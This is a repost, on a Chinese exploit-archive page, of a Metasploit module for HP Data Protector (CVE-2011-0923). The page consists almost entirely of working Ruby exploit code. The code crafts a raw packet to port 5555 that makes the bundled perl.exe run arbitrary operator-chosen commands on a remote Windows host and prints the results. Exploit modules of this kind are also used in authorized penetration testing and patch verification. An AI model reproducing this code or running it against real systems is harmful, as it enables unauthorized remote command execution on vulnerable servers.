HP Data Protector Arbitrary Remote Command Execution (msf)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

HP Data Protector Arbitrary Remote Command Execution (msf)

来源：metasploit.com 作者：Moletta 发布时间：2013-08-08

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'HP Data Protector Arbitrary Remote Command Execution',
			'Description'	=> %q{
				This script allows to execute a command with an arbitrary number
				of arguments on Microsoft Windows operating systems. The trick 
				calls a perl.exe interpreter installed with HP Data Protector 
				inside the directory {install_path}/bin/.
				
				The main goal of the script is to bypass the limitation of execute
				only a single command without parameters, as provided by already existing
                                exploits. It is possible to exploit the security issue in order to run 
                                any command inside the target system. 
			},

			'License'	=> MSF_LICENSE,
			'Author'        =>
				[
					'Alessandro Di Pinto <alessandro.dipinto () artificialstudios org>',
					'Claudio Moletta <mclaudio () gmail com>',
				],
			'References' 	=>
				[
					[ 'CVE', '2011-0923'],
					[ 'OSVDB', '72526'],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
					[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143'],
				],
		))

		register_options(
			[
				Opt::RPORT(5555),
				OptString.new('CMD', [ true, 'The OS command to execute', 'ipconfig /all'])
			], self.class)
	end

	def run
		begin
			command = datastore['CMD']
			command = command.gsub("\\","\\\\\\")
			offset = 45
    			size_command = (offset + command.length).chr

			crafted_pkt = "\x00\x00\x00"
			crafted_pkt << size_command
			crafted_pkt << "\x32\x00\x01"
			crafted_pkt << "\x01\x01\x01"
			crafted_pkt << "\x01\x01\x00"
			crafted_pkt << "\x01\x00\x01"
			crafted_pkt << "\x00\x01\x00"
			crafted_pkt << "\x01\x01\x00"
			crafted_pkt << "\x2028\x00"
			crafted_pkt << "\\perl.exe"
			crafted_pkt << "\x00 -esystem('#{command}')\x00"

			print_status "Connecting to target '#{rhost}:#{rport}'"
			connect
			print_good "Connected"
				if (datastore['CMD'])
				print_status "Sending payload '#{command}'\n"
				sock.put(crafted_pkt)
				# Clean and parse results
				while true
					response_size = sock.recv(4)
					response_size = response_size.unpack('N')[0]
					break if response_size.nil?
					response = sock.recv(response_size)[5..-1]
					response = response.delete("\x00")
					# Check for the end-of-message
					break if response.include?("RETVAL") 
					print response if not response.empty?
				end
			end
			disconnect

		rescue ::Rex::ConnectionRefused
			print_error "Connection refused '#{rhost}:#{rport}'"
		rescue ::Rex::ConnectionError
			print_error "Connection error '#{rhost}:#{rport}'"
		end
	end

end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告